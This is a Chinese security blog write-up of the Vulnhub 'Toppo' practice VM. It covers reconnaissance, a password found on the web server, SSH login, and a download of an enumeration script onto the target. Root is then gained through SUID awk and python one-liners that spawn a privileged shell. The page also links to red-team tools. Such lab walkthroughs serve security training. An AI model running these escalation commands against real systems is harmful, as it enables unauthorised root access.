Vulnhub-Toppo靶机,python、awk的SUID提权,两种提权方式

090921

Vulnhub-Toppo靶机,SUID提权

这个靶机主要是suid提权,相对简单,靶机下载:

官网链接:https://download.vulnhub.com/toppo/Toppo.zip

image-20250814125553970

使用nmap和dirb进行web打点

nmap -sS 10.10.10.222 -p- -A -T4
dirsearch -u http://10.10.10.222/

image-20250814125614906

web识别,是一个普通的html页面

whatweb http://10.10.10.222/

image-20250814125828904

发现了一个密码信息 12345ted123

image-20250814125935693

我们猜测账号就是那串密码夹着中间的英文ted

image-20250814132647573

登录成功之后就是内网渗透,我们使用FeatherScan进行内网信息收集

git clone https://github.com/baibaixiaoyu2024/FeatherScan.git
cd FeatherScan_v4_5_
python -m http.server

# 靶机
wget 10.10.10.130:8000/FeatherScan_v4_5
wget 10.10.10.130:8000/feather_vuln_db.txt
chmod +x FeatherScan_v4_5
./FeatherScan_v4_5

image-20250814140403074

发现提权漏洞

image-20250814140329034

得到两个提权向量,两个命令都可以用

awk 'BEGIN {system("/bin/sh")}'
python -c 'import os; os.execl("/bin/sh", "sh", "-p")' # 靶机没有sh就用bash替换

image-20250814140600238

至此提权成功!很简单吧

本站小部分内容转载于互联网,如有侵权还请联系
THE END
OSCP打靶泷羽收录
喜欢就关注一下咱们公众号吧
点赞21 分享
白小羽的头像-泷羽Sec
2025最新渗透测试靶场推荐,新手必练的靶场推荐-泷羽Sec
2025最新渗透测试靶场推荐,新手必练的靶场推荐
2025最新渗透测试靶场推荐,新手必练的靶场推荐
4个月前 3770
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用-泷羽Sec
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
28天前 2725
src平台推荐,挖SRC必须知道的25个漏洞提交平台-泷羽Sec
src平台推荐,挖SRC必须知道的25个漏洞提交平台
src平台推荐,挖SRC必须知道的25个漏洞提交平台
3个月前 2721
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细-泷羽Sec
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
32天前 2219
几个常见的密码字典推荐-泷羽Sec
几个常见的密码字典推荐
几个常见的密码字典推荐
5个月前 2173
BurpSuite v2025.6.3汉化版,附激活教程-泷羽Sec
BurpSuite v2025.6.3汉化版,附激活教程
BurpSuite v2025.6.3汉化版,附激活教程
3个月前 1992
相关推荐
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细-泷羽Sec
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
32天前 2219
【Windows版】Acunetix Premium(AWVS) v25.8.25 高级版-泷羽Sec
【Windows版】Acunetix Premium(AWVS) v25.8.25 高级版
【Windows版】Acunetix Premium(AWVS) v25.8.25 高级版
17天前 1107
内网渗透实战:从Web打点到域控通关-泷羽Sec
内网渗透实战:从Web打点到域控通关
内网渗透实战:从Web打点到域控通关
16天前 966
文章推荐页-泷羽Sec
文章推荐页
文章推荐页
21天前 48
【Java漏洞综合利用工具】Hyacinth v2.1-泷羽Sec
【Java漏洞综合利用工具】Hyacinth v2.1
【Java漏洞综合利用工具】Hyacinth v2.1
17天前 1309
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路-泷羽Sec
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
5个月前 387
【kali笔记】figlet终端艺术字-泷羽Sec
【kali笔记】figlet终端艺术字
【kali笔记】figlet终端艺术字
5个月前 1067
【kali笔记】MSF内网渗透,免杀过360-泷羽Sec
【kali笔记】MSF内网渗透,免杀过360
【kali笔记】MSF内网渗透,免杀过360
5个月前 1067
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片
快捷回复
谢谢你的分享,我从中学到了很多!
教程很好用,谢谢!
好东西,学习一下!
楼主听话,快到碗里来!
路过一下,我只是来打酱油的!
水帖美如花,养护靠大家!

    暂无评论内容

OSCP介绍-泷羽Sec
往期推荐